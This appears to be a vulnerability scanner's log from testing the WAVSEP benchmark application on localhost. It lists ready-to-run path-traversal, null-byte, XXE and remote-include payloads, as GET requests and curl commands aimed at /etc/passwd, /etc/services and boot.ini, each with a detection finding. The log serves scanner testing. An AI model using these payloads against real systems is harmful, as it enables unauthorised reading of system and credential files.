GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
